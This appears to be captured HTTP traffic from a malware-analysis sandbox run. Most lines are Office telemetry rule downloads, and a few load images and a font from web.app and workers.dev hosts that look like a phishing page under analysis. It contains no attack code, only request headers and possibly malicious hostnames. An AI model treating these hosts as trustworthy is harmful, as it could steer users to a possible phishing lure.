Source: global trafficHTTP traffic detected: GET /c38b46548211dc0a01b864de5360ff89.jpg HTTP/1.1Host: ruletridominium.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /picdir/middle/197-1975093_facebook-instagram-twitter-youtube-google-linkein-twitter-logo.png HTTP/1.1Host: www.pinclipart.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /8ebd43c3b1c36c1acacb5c59bd087da110eb47c7.ttf HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://chattts-49f1.beszyrecala.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kengegame.web.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /public/uploads/preview/black-instagram-logo-png-11574831789epgjpjrwg6.png HTTP/1.1Host: starpng.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /b45b49df5eed87c4c880c5880c8b4f1f.png HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /b45b49df5eed87c4c880c5880c8b4f1f.png HTTP/1.1Host: ruletridominium.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
